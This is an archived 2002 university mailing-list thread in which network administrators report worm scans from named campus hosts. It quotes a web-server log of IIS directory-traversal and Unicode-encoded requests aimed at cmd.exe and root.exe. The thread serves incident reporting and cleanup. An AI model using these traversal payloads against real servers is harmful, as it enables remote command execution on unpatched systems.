I own three of them (.nscl.msu.edu machines) and am cleaning them up ASAP. Thanks for the info. Sorry for any inconvenience. Katie Clark Computer Support National Superconducting Cyclotron Laboratory Michigan State University (517) 333-6338 -----Original Message----- From: MSU Network Administrators Group [mailto:[log in to unmask]]On Behalf Of Paul Donahue Sent: Monday, January 21, 2002 9:27 AM To: [log in to unmask] Subject: Re: MS Virus or Worm activity Not to be a "me-too"er but I have noticed the same from the same IP addresses on one of our windows boxes. ZoneAlarm showed approximately 400 alerts since 6pm Friday until 8am this morning. Paul Donahue Lead Computer/Network Technician CVM Information Technology Center A227 VMC, Michigan State University Phone: 353-5551 Fax: 432-2937 >>> [log in to unmask] 01/21/02 08:51AM >>> Probes from these hosts started coming in just before 11:00pm Saturday night: 35.8.164.90 - bigone.hrt.msu.edu 35.8.33.189 - fpc04.nscl.msu.edu 35.8.34.114 - cycpc54.nscl.msu.edu 35.8.33.203 - talon.nscl.msu.edu 35.8.107.198 - No host name in DNS. Domain: llc, Language Learning Center in Old Hort Probe examples: 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy ste m32/cmd.exe?/c+dir HTTP/1.0" 404 343 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 -- Gene Willacker, Systems Analyst MSU Division of Housing and Food Service Food Stores Building 171 Service Road East Lansing, MI 48824-1233 517-353-1691